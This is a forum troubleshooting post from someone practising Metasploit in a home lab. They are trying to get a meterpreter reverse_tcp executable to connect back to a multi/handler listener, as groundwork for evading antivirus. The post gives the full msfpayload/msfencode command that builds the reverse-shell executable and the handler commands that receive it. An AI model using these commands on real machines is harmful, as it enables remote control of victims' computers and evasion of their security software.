Also, i wanted to try what is presented in the first half of this video. Very helpful.
hxxp://w w w.offensive-security.com/videos/shmoocon-presentation-2008-video/piss-on-your-av.html
Unfortunately, it's been a while since ive tried the reverse_tcp > exe payload and now im having issues. All I get when running multi/handler is
Just sits there even though I can confirm on the target computer that the output.exe process began running. The exact commands I used were
[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler[*] Starting the payload handler...
to create the .exe and then
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=5555 R | ./msfencode -b '' -t exe -o output.exe
bt ~ # ./msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.0.101
msf > set LPORT 5555
msf > show options
msf > exploit
Both systems are on the same subnet. Targen IP=192.168.0.102 running windows xp SP3, all firewalls/AV disabled. Attacking IP=192.168.0.101 running BT4 prefinal. I was hoping this configuration would be easy since i got it working before. Something changed and now i cant even start to look at avoiding AV. Any help appreciated!